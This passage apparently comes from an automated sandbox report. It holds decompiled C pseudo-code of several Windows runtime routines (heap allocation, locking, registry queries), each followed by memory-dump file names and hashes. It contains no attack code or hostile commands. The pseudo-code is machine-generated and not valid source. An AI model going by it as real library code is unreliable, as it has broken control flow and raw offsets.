                                        				_t124 = L053B4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                        				if(_t124 != 0) {
                                        					 *_t124 =  *_t124 & 0x00000000;
                                        					_t124[1] = _t124[1] & 0x00000000;
                                        					_t124[4] = _t124[4] & 0x00000000;
                                        					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                        						L13:
                                        						_push(_t124);
                                        						if((_t106 & 0x00000002) != 0) {
                                        							_push(0x200);
                                        							_push(0x28);
                                        							_push(0xffffffff);
                                        							_t122 = E053D9800();
                                        							if(_t122 < 0) {
                                        								L33:
                                        								if((_t124[4] & 0x00000001) != 0) {
                                        									_push(4);
                                        									_t64 =  &(_t124[1]); // 0x4
                                        									_t107 = _t64;
                                        									_push(_t107);
                                        									_push(5);
                                        									_push(0xfffffffe);
                                        									E053D95B0();
                                        									if( *_t107 != 0) {
                                        										_push( *_t107);
                                        										E053D95D0();
                                        									}
                                        								}
                                        								_push(_t124);
                                        								_push(0);
                                        								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                        								L37:
                                        								L053B77F0();
                                        								return _t122;
                                        							}
                                        							_t124[4] = _t124[4] | 0x00000002;
                                        							L18:
                                        							_t108 = _a8;
                                        							_t29 =  &(_t124[0x105]); // 0x414
                                        							_t80 = _t29;
                                        							_t30 =  &(_t124[5]); // 0x14
                                        							_t124[3] = _t80;
                                        							_t123 = 0;
                                        							_t124[2] = _t30;
                                        							 *_t80 = _t108;
                                        							if(_t108 == 0) {
                                        								L21:
                                        								_t112 = 0x400;
                                        								_push( &_v8);
                                        								_v8 = 0x400;
                                        								_push(_t124[2]);
                                        								_push(0x400);
                                        								_push(_t124[3]);
                                        								_push(0);
                                        								_push( *_t124);
                                        								_t122 = E053D9910();
                                        								if(_t122 != 0xc0000023) {
                                        									L26:
                                        									if(_t122 != 0x106) {
                                        										L40:
                                        										if(_t122 < 0) {
                                        											L29:
                                        											_t83 = _t124[2];
                                        											if(_t83 != 0) {
                                        												_t59 =  &(_t124[5]); // 0x14
                                        												if(_t83 != _t59) {
                                        													L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                        												}
                                        											}
                                        											_push( *_t124);
                                        											E053D95D0();
                                        											goto L33;
                                        										}
                                        										 *_a16 = _t124;
                                        										return 0;
                                        									}
                                        									if(_t108 != 1) {
                                        										_t122 = 0;
                                        										goto L40;
                                        									}
                                        									_t122 = 0xc0000061;
                                        									goto L29;
                                        								} else {
                                        									goto L22;
                                        								}
                                        								while(1) {
                                        									L22:
                                        									_t89 =  *0x5487b9c; // 0x0
                                        									_t92 = L053B4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                        									_t124[2] = _t92;
                                        									if(_t92 == 0) {
                                        										break;
                                        									}
                                        									_t112 =  &_v8;
                                        									_push( &_v8);
                                        									_push(_t92);
                                        									_push(_v8);
                                        									_push(_t124[3]);
                                        									_push(0);
                                        									_push( *_t124);
                                        									_t122 = E053D9910();
                                        									if(_t122 != 0xc0000023) {
                                        										goto L26;
                                        									}
                                        									L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                        								}
                                        								_t122 = 0xc0000017;
                                        								goto L26;
                                        							}
                                        							_t119 = 0;
                                        							do {
                                        								_t114 = _t124[3];
                                        								_t119 = _t119 + 0xc;
                                        								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                        								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                        								_t123 = _t123 + 1;
                                        								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                        							} while (_t123 < _t108);
                                        							goto L21;
                                        						}
                                        						_push(0x28);
                                        						_push(3);
                                        						_t122 = E0539A7B0();
                                        						if(_t122 < 0) {
                                        							goto L33;
                                        						}
                                        						_t124[4] = _t124[4] | 0x00000001;
                                        						goto L18;
                                        					}
                                        					if((_t106 & 0x00000001) == 0) {
                                        						_t115 = 0x28;
                                        						_t122 = E0542E7D3(_t115, _t124);
                                        						if(_t122 < 0) {
                                        							L9:
                                        							_push(_t124);
                                        							_push(0);
                                        							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                        							goto L37;
                                        						}
                                        						L12:
                                        						if( *_t124 != 0) {
                                        							goto L18;
                                        						}
                                        						goto L13;
                                        					}
                                        					_t15 =  &(_t124[1]); // 0x4
                                        					_t117 = 4;
                                        					_t122 = E0542E7D3(_t117, _t15);
                                        					if(_t122 >= 0) {
                                        						_t124[4] = _t124[4] | 0x00000001;
                                        						_v12 = _v12 & 0x00000000;
                                        						_push(4);
                                        						_push( &_v12);
                                        						_push(5);
                                        						_push(0xfffffffe);
                                        						E053D95B0();
                                        						goto L12;
                                        					}
                                        					goto L9;
                                        				} else {
                                        					return 0xc0000017;
                                        				}
                                        			}





















                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad93416e24ddb154d7b56e99cd355e546d99c8f09267062e4d0b187651d6d028
                                        • Instruction ID: 723a89d3c4ac3f9c2714e1a34e5499b76a4e48dafc2a79f0d122803f157605e9
                                        • Opcode Fuzzy Hash: ad93416e24ddb154d7b56e99cd355e546d99c8f09267062e4d0b187651d6d028
                                        • Instruction Fuzzy Hash: 78712432200B21AFD732CF14C849FA6B7F6FF40720F54456AE6568B6A0DBB5E941CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E053952A5(char __ecx) {
                                        				char _v20;
                                        				char _v28;
                                        				char _v29;
                                        				void* _v32;
                                        				void* _v36;
                                        				void* _v37;
                                        				void* _v38;
                                        				void* _v40;
                                        				void* _v46;
                                        				void* _v64;
                                        				void* __ebx;
                                        				intOrPtr* _t49;
                                        				signed int _t53;
                                        				short _t85;
                                        				signed int _t87;
                                        				signed int _t88;
                                        				signed int _t89;
                                        				intOrPtr _t101;
                                        				intOrPtr* _t102;
                                        				intOrPtr* _t104;
                                        				signed int _t106;
                                        				void* _t108;
                                        
                                        				_t93 = __ecx;
                                        				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                        				_push(_t88);
                                        				_v29 = __ecx;
                                        				_t89 = _t88 | 0xffffffff;
                                        				while(1) {
                                        					E053AEEF0(0x54879a0);
                                        					_t104 =  *0x5488210; // 0x32f2bb0
                                        					if(_t104 == 0) {
                                        						break;
                                        					}
                                        					asm("lock inc dword [esi]");
                                        					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                        					E053AEB70(_t93, 0x54879a0);
                                        					if( *((char*)(_t108 + 0xf)) != 0) {
                                        						_t101 =  *0x7ffe02dc;
                                        						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                        						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                        							L9:
                                        							_push(0);
                                        							_push(0);
                                        							_push(0);
                                        							_push(0);
                                        							_push(0x90028);
                                        							_push(_t108 + 0x20);
                                        							_push(0);
                                        							_push(0);
                                        							_push(0);
                                        							_push( *((intOrPtr*)(_t104 + 4)));
                                        							_t53 = E053D9890();
                                        							__eflags = _t53;
                                        							if(_t53 >= 0) {
                                        								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                        								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                        									E053AEEF0(0x54879a0);
                                        									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                        									E053AEB70(0, 0x54879a0);
                                        								}
                                        								goto L3;
                                        							}
                                        							__eflags = _t53 - 0xc0000012;
                                        							if(__eflags == 0) {
                                        								L12:
                                        								_t13 = _t104 + 0xc; // 0x32f2bbd
                                        								_t93 = _t13;
                                        								 *((char*)(_t108 + 0x12)) = 0;
                                        								__eflags = E053CF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                        								if(__eflags >= 0) {
                                        									L15:
                                        									_t102 = _v28;
                                        									 *_t102 = 2;
                                        									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                        									E053AEEF0(0x54879a0);
                                        									__eflags =  *0x5488210 - _t104; // 0x32f2bb0
                                        									if(__eflags == 0) {
                                        										__eflags =  *((char*)(_t108 + 0xe));
                                        										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                        										 *0x5488210 = _t102;
                                        										_t32 = _t102 + 0xc; // 0x0
                                        										 *_t95 =  *_t32;
                                        										_t33 = _t102 + 0x10; // 0x0
                                        										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                        										_t35 = _t102 + 4; // 0xffffffff
                                        										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                        										if(__eflags != 0) {
                                        											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                        											E05414888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                        										}
                                        										E053AEB70(_t95, 0x54879a0);
                                        										asm("lock xadd [esi], eax");
                                        										if(__eflags == 0) {
                                        											_push( *((intOrPtr*)(_t104 + 4)));
                                        											E053D95D0();
                                        											L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                        											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                        										}
                                        										asm("lock xadd [esi], ebx");
                                        										__eflags = _t89 == 1;
                                        										if(_t89 == 1) {
                                        											_push( *((intOrPtr*)(_t104 + 4)));
                                        											E053D95D0();
                                        											L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                        											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                        										}
                                        										_t49 = _t102;
                                        										L4:
                                        										return _t49;
                                        									}
                                        									E053AEB70(_t93, 0x54879a0);
                                        									asm("lock xadd [esi], eax");
                                        									if(__eflags == 0) {
                                        										_push( *((intOrPtr*)(_t104 + 4)));
                                        										E053D95D0();
                                        										L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                        										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                        									}
                                        									 *_t102 = 1;
                                        									asm("lock xadd [edi], eax");
                                        									if(__eflags == 0) {
                                        										_t28 = _t102 + 4; // 0xffffffff
                                        										_push( *_t28);
                                        										E053D95D0();
                                        										L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                        									}
                                        									continue;
                                        								}
                                        								_t93 =  &_v20;
                                        								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                        								_t85 = 6;
                                        								_v20 = _t85;
                                        								_t87 = E053CF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                        								__eflags = _t87;
                                        								if(_t87 < 0) {
                                        									goto L3;
                                        								}
                                        								 *((char*)(_t108 + 0xe)) = 1;
                                        								goto L15;
                                        							}
                                        							__eflags = _t53 - 0xc000026e;
                                        							if(__eflags != 0) {
                                        								goto L3;
                                        							}
                                        							goto L12;
                                        						}
                                        						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                        						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                        							goto L3;
                                        						} else {
                                        							goto L9;
                                        						}
                                        					}
                                        					L3:
                                        					_t49 = _t104;
                                        					goto L4;
                                        				}
                                        				_t49 = 0;
                                        				goto L4;
                                        			}

























                                        0x053f0f59
                                        0x053952eb
                                        0x053952f1
                                        0x053952f1
                                        0x053f0e7d
                                        0x053f0e84
                                        0x053f0e88
                                        0x053f0e8a
                                        0x053f0e8d
                                        0x053f0e9e
                                        0x053f0ea3
                                        0x053f0ea3
                                        0x053f0ea7
                                        0x053f0eaf
                                        0x053f0eb3
                                        0x053f0eb9
                                        0x053f0eb9
                                        0x053f0ebc
                                        0x053f0ecd
                                        0x053f0ecd
                                        0x00000000
                                        0x053f0eb3
                                        0x053f0e21
                                        0x053f0e2b
                                        0x053f0e2f
                                        0x053f0e30
                                        0x053f0e3a
                                        0x053f0e3f
                                        0x053f0e41
                                        0x00000000
                                        0x00000000
                                        0x053f0e47
                                        0x00000000
                                        0x053f0e47
                                        0x053f0df9
                                        0x053f0dfe
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x053f0dfe
                                        0x05395303
                                        0x05395307
                                        0x00000000
                                        0x05395309
                                        0x00000000
                                        0x05395309
                                        0x05395307
                                        0x053952e9
                                        0x053952e9
                                        0x00000000
                                        0x053952e9
                                        0x0539530e
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 995848f2585a0c55f14c1a2bd0e30e5f24dd9c7a8632f697ed16c4faf8a45c94
                                        • Instruction ID: d738525db330b3d30e5c1a95ae1dbd7aa7eb40a151045ffb7e41db4eb8462277
                                        • Opcode Fuzzy Hash: 995848f2585a0c55f14c1a2bd0e30e5f24dd9c7a8632f697ed16c4faf8a45c94
                                        • Instruction Fuzzy Hash: C0511172209341ABD725EF68C849B6BFBE9FF44710F10091EF5A687651E7B0E844C791
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E053AEF40(intOrPtr __ecx) {
                                        				char _v5;
                                        				char _v6;
                                        				char _v7;
                                        				char _v8;
                                        				signed int _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				intOrPtr _t58;
                                        				char _t59;
                                        				signed char _t69;
                                        				void* _t73;
                                        				signed int _t74;
                                        				char _t79;
                                        				signed char _t81;
                                        				signed int _t85;
                                        				signed int _t87;
                                        				intOrPtr _t90;
                                        				signed char* _t91;
                                        				void* _t92;
                                        				signed int _t94;
                                        				void* _t96;
                                        
                                        				_t90 = __ecx;
                                        				_v16 = __ecx;
                                        				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                        					_t58 =  *((intOrPtr*)(__ecx));
                                        					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                        						E05399080(_t73, __ecx, __ecx, _t92);
                                        					}
                                        				}
                                        				_t74 = 0;
                                        				_t96 =  *0x7ffe036a - 1;
                                        				_v12 = 0;
                                        				_v7 = 0;
                                        				if(_t96 > 0) {
                                        					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                        					_v12 = _t74;
                                        					_v7 = _t96 != 0;
                                        				}
                                        				_t79 = 0;
                                        				_v8 = 0;
                                        				_v5 = 0;
                                        				while(1) {
                                        					L4:
                                        					_t59 = 1;
                                        					L5:
                                        					while(1) {
                                        						if(_t59 == 0) {
                                        							L12:
                                        							_t21 = _t90 + 4; // 0x77dfc21e
                                        							_t87 =  *_t21;
                                        							_v6 = 0;
                                        							if(_t79 != 0) {
                                        								if((_t87 & 0x00000002) != 0) {
                                        									goto L19;
                                        								}
                                        								if((_t87 & 0x00000001) != 0) {
                                        									_v6 = 1;
                                        									_t74 = _t87 ^ 0x00000003;
                                        								} else {
                                        									_t51 = _t87 - 2; // -2
                                        									_t74 = _t51;
                                        								}
                                        								goto L15;
                                        							} else {
                                        								if((_t87 & 0x00000001) != 0) {
                                        									_v6 = 1;
                                        									_t74 = _t87 ^ 0x00000001;
                                        								} else {
                                        									_t26 = _t87 - 4; // -4
                                        									_t74 = _t26;
                                        									if((_t74 & 0x00000002) == 0) {
                                        										_t74 = _t74 - 2;
                                        									}
                                        								}
                                        								L15:
                                        								if(_t74 == _t87) {
                                        									L19:
                                        									E05392D8A(_t74, _t90, _t87, _t90);
                                        									_t74 = _v12;
                                        									_v8 = 1;
                                        									if(_v7 != 0 && _t74 > 0x64) {
                                        										_t74 = _t74 - 1;
                                        										_v12 = _t74;
                                        									}
                                        									_t79 = _v5;
                                        									goto L4;
                                        								}
                                        								asm("lock cmpxchg [esi], ecx");
                                        								if(_t87 != _t87) {
                                        									_t74 = _v12;
                                        									_t59 = 0;
                                        									_t79 = _v5;
                                        									continue;
                                        								}
                                        								if(_v6 != 0) {
                                        									_t74 = _v12;
                                        									L25:
                                        									if(_v7 != 0) {
                                        										if(_t74 < 0x7d0) {
                                        											if(_v8 == 0) {
                                        												_t74 = _t74 + 1;
                                        											}
                                        										}
                                        										_t38 = _t90 + 0x14; // 0x0
                                        										_t39 = _t90 + 0x14; // 0x0
                                        										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                        										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                        											_t85 = _t85 & 0xff000000;
                                        										}
                                        										 *(_t90 + 0x14) = _t85;
                                        									}
                                        									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                        									 *((intOrPtr*)(_t90 + 8)) = 1;
                                        									return 0;
                                        								}
                                        								_v5 = 1;
                                        								_t87 = _t74;
                                        								goto L19;
                                        							}
                                        						}
                                        						_t94 = _t74;
                                        						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                        						if(_t74 == 0) {
                                        							goto L12;
                                        						} else {
                                        							_t91 = _t90 + 4;
                                        							goto L8;
                                        							L9:
                                        							while((_t81 & 0x00000001) != 0) {
                                        								_t69 = _t81;
                                        								asm("lock cmpxchg [edi], edx");
                                        								if(_t69 != _t81) {
                                        									_t81 = _t69;
                                        									continue;
                                        								}
                                        								_t90 = _v16;
                                        								goto L25;
                                        							}
                                        							asm("pause");
                                        							_t94 = _t94 - 1;
                                        							if(_t94 != 0) {
                                        								L8:
                                        								_t81 =  *_t91;
                                        								goto L9;
                                        							} else {
                                        								_t90 = _v16;
                                        								_t79 = _v5;
                                        								goto L12;
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}





























                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                        • Instruction ID: af6a31c5398f86690ab1413389c2d9d7c3c4c37ab356456120cd9220978374a8
                                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                        • Instruction Fuzzy Hash: 02513536E04249DFDB24CB68C0D4BBEFBB6FF05304F1981A8D45593281C3B5A988D761
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E0546740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                        				signed short* _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _t55;
                                        				void* _t56;
                                        				intOrPtr* _t66;
                                        				intOrPtr* _t69;
                                        				void* _t74;
                                        				intOrPtr* _t78;
                                        				intOrPtr* _t81;
                                        				intOrPtr* _t82;
                                        				intOrPtr _t83;
                                        				signed short* _t84;
                                        				intOrPtr _t85;
                                        				signed int _t87;
                                        				intOrPtr* _t90;
                                        				intOrPtr* _t93;
                                        				intOrPtr* _t94;
                                        				void* _t98;
                                        
                                        				_t84 = __edx;
                                        				_t80 = __ecx;
                                        				_push(__ecx);
                                        				_push(__ecx);
                                        				_t55 = __ecx;
                                        				_v8 = __edx;
                                        				_t87 =  *__edx & 0x0000ffff;
                                        				_v12 = __ecx;
                                        				_t3 = _t55 + 0x154; // 0x154
                                        				_t93 = _t3;
                                        				_t78 =  *_t93;
                                        				_t4 = _t87 + 2; // 0x2
                                        				_t56 = _t4;
                                        				while(_t78 != _t93) {
                                        					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                        						L4:
                                        						_t78 =  *_t78;
                                        						continue;
                                        					} else {
                                        						_t7 = _t78 + 0x18; // 0x18
                                        						if(E053ED4F0(_t7, _t84[2], _t87) == _t87) {
                                        							_t40 = _t78 + 0xc; // 0xc
                                        							_t94 = _t40;
                                        							_t90 =  *_t94;
                                        							while(_t90 != _t94) {
                                        								_t41 = _t90 + 8; // 0x8
                                        								_t74 = E053DF380(_a4, _t41, 0x10);
                                        								_t98 = _t98 + 0xc;
                                        								if(_t74 != 0) {
                                        									_t90 =  *_t90;
                                        									continue;
                                        								}
                                        								goto L12;
                                        							}
                                        							_t82 = L053B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                        							if(_t82 != 0) {
                                        								_t46 = _t78 + 0xc; // 0xc
                                        								_t69 = _t46;
                                        								asm("movsd");
                                        								asm("movsd");
                                        								asm("movsd");
                                        								asm("movsd");
                                        								_t85 =  *_t69;
                                        								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                        									L20:
                                        									_t82 = 3;
                                        									asm("int 0x29");
                                        								}
                                        								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                        								 *_t82 = _t85;
                                        								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                        								 *_t69 = _t82;
                                        								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                        								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                        								goto L11;
                                        							} else {
                                        								L18:
                                        								_push(0xe);
                                        								_pop(0);
                                        							}
                                        						} else {
                                        							_t84 = _v8;
                                        							_t9 = _t87 + 2; // 0x2
                                        							_t56 = _t9;
                                        							goto L4;
                                        						}
                                        					}
                                        					L12:
                                        					return 0;
                                        				}
                                        				_t10 = _t87 + 0x1a; // 0x1a
                                        				_t78 = L053B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                        				if(_t78 == 0) {
                                        					goto L18;
                                        				} else {
                                        					_t12 = _t87 + 2; // 0x2
                                        					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                        					_t16 = _t78 + 0x18; // 0x18
                                        					E053DF3E0(_t16, _v8[2], _t87);
                                        					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                        					_t19 = _t78 + 0xc; // 0xc
                                        					_t66 = _t19;
                                        					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                        					 *_t66 = _t66;
                                        					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                        					_t81 = L053B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                        					if(_t81 == 0) {
                                        						goto L18;
                                        					} else {
                                        						_t26 = _t78 + 0xc; // 0xc
                                        						_t69 = _t26;
                                        						asm("movsd");
                                        						asm("movsd");
                                        						asm("movsd");
                                        						asm("movsd");
                                        						_t85 =  *_t69;
                                        						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                        							goto L20;
                                        						} else {
                                        							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                        							 *_t81 = _t85;
                                        							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                        							 *_t69 = _t81;
                                        							_t83 = _v12;
                                        							 *(_t78 + 8) = 1;
                                        							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                        							_t34 = _t83 + 0x154; // 0x1ba
                                        							_t69 = _t34;
                                        							_t85 =  *_t69;
                                        							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                        								goto L20;
                                        							} else {
                                        								 *_t78 = _t85;
                                        								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                        								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                        								 *_t69 = _t78;
                                        								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                        							}
                                        						}
                                        						goto L11;
                                        					}
                                        				}
                                        				goto L12;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                        • Instruction ID: e5cc832e7c3fe8d3a1a09ba9aac46dbbdf1a666cb7185c3f4b03b49a2e4c0f2c
                                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                        • Instruction Fuzzy Hash: 78518B71600606EFDB15CF54C480B96BBB6FF45308F15C1EAE9089F222E371E946CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E053C4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                        				signed int _v12;
                                        				char _v176;
                                        				char _v177;
                                        				char _v184;
                                        				intOrPtr _v192;
                                        				intOrPtr _v196;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed short _t42;
                                        				char* _t44;
                                        				intOrPtr _t46;
                                        				intOrPtr _t50;
                                        				char* _t57;
                                        				intOrPtr _t59;
                                        				intOrPtr _t67;
                                        				signed int _t69;
                                        
                                        				_t64 = __edx;
                                        				_v12 =  *0x548d360 ^ _t69;
                                        				_t65 = 0xa0;
                                        				_v196 = __edx;
                                        				_v177 = 0;
                                        				_t67 = __ecx;
                                        				_v192 = __ecx;
                                        				E053DFA60( &_v176, 0, 0xa0);
                                        				_t57 =  &_v176;
                                        				_t59 = 0xa0;
                                        				if( *0x5487bc8 != 0) {
                                        					L3:
                                        					while(1) {
                                        						asm("movsd");
                                        						asm("movsd");
                                        						asm("movsd");
                                        						asm("movsd");
                                        						_t67 = _v192;
                                        						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                        						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                        						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                        						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                        						_push( &_v184);
                                        						_push(_t59);
                                        						_push(_t57);
                                        						_push(0xa0);
                                        						_push(_t57);
                                        						_push(0xf);
                                        						_t42 = E053DB0B0();
                                        						if(_t42 != 0xc0000023) {
                                        							break;
                                        						}
                                        						if(_v177 != 0) {
                                        							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                        						}
                                        						_v177 = 1;
                                        						_t44 = L053B4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                        						_t59 = _v184;
                                        						_t57 = _t44;
                                        						if(_t57 != 0) {
                                        							continue;
                                        						} else {
                                        							_t42 = 0xc0000017;
                                        							break;
                                        						}
                                        					}
                                        					if(_t42 != 0) {
                                        						_t65 = E0539CCC0(_t42);
                                        						if(_t65 != 0) {
                                        							L10:
                                        							if(_v177 != 0) {
                                        								if(_t57 != 0) {
                                        									L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                        								}
                                        							}
                                        							_t46 = _t65;
                                        							L12:
                                        							return E053DB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                        						}
                                        						L7:
                                        						_t50 = _a4;
                                        						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                        						if(_t50 != 3) {
                                        							if(_t50 == 2) {
                                        								goto L8;
                                        							}
                                        							L9:
                                        							if(E053DF380(_t67 + 0xc, 0x5375138, 0x10) == 0) {
                                        								 *0x54860d8 = _t67;
                                        							}
                                        							goto L10;
                                        						}
                                        						L8:
                                        						_t64 = _t57 + 0x28;
                                        						E053C4F49(_t67, _t57 + 0x28);
                                        						goto L9;
                                        					}
                                        					_t65 = 0;
                                        					goto L7;
                                        				}
                                        				if(E053C4E70(0x54886b0, 0x53c5690, 0, 0) != 0) {
                                        					_t46 = E0539CCC0(_t56);
                                        					goto L12;
                                        				} else {
                                        					_t59 = 0xa0;
                                        					goto L3;
                                        				}
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5dee0d44cb7b7dcb79b6cfd511bafdfdc251cc5f6684a458076f328103d0acc3
                                        • Instruction ID: 1f7e7e516ee8796be65f38161f4ff3a651123e53b835081807e512e586e68556
                                        • Opcode Fuzzy Hash: 5dee0d44cb7b7dcb79b6cfd511bafdfdc251cc5f6684a458076f328103d0acc3
                                        • Instruction Fuzzy Hash: 3441B471A403189FEF21DF24CC95FAABBBAEB45610F0500EEE9469B681D7B4DD40CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
